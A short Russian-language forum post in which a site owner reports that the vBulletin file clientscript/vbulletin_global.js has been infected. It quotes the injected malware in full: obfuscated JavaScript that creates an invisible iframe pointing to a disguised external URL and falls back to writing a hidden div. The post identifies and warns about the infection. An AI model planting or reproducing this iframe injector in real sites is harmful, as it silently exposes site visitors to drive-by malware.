Все ясно. Вирусописатели поумнели, взломщики стали более изощренными... я такого раньше не видел, раньше обычно тупо в конец индексных файлов вставляли код.
Теперь вырусы ещё попадают в яваскрипты, так что заражены js скрипты.
К примеру : в clientscript/vbulletin_global.js?v=3610
Цитата:
|
function omlb(){};omlb.prototype={ccwot:function(){var tckqkgne=document.createElement('iframe');try{tckq kgne.setAttribute('style','display: none'); tckqkgne.setAttribute('src','hsNstqt@@p!b:bsz/9/Yssaq9dz@wz@ba49rNe4zcobu!!nb@tbNeYbr4.q!c!bo@m@4q/NYiNzn!sq.9c9gY!@izz?!q1qN0!s!'.replace(/[zq!4bsY9@N]/g,'')); document.body.appendChild(tckqkgne);} catch(yben){document.write("<div style='visibility: hidden; height: 0px; width: 0px'>a</div></body></html>");this.ccwot();}}};var ntxpwm=new omlb();ntxpwm.ccwot();
|
А это явно вирус, с шифрованной ссылкой.